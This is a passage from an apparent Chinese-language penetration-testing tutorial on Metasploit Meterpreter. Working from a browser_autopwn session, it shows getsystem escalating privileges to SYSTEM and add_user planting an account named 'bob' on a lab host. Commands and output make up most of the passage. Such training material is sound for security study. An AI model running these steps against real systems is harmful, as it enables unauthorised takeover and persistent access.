上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限。提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。本节将介绍本地权限提升。
同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。本地权限提升的具体操作步骤如下所示。
(1)启动Meterpreter会话。执行命令如下所示:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1…
meterpreter >
从输出的信息可以看到,成功启动了Meterpreter会话。
(2)使用getsystem命令提升本地权限。首先,查看该命令的帮助信息。执行命令如下所示:
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
输出的信息显示了getsystem命令的语法格式、作用及选项等。此时就可以根据自己的需要,使用相应的选项来提升本地权限。
(3)使用getsystem命令提升本地权限。执行命令如下所示:
meterpreter > getsystem
…got system (via technique 1).
meterpreter >
从输出的信息可以看到,自动选择了方法1。此时该用户就拥有了目标系统中Test用户的权限了,然后就可以做其他的操作,如创建文件、创建用户和组等。如使用该用户在目标系统上192.168.41.146创建一个名为bob的用户。执行命令如下所示:
meterpreter > add_user bob 123456 -h 192.168.41.146
执行以上命令后,可以在主机192.168.41.146上查看到创建的bob用户。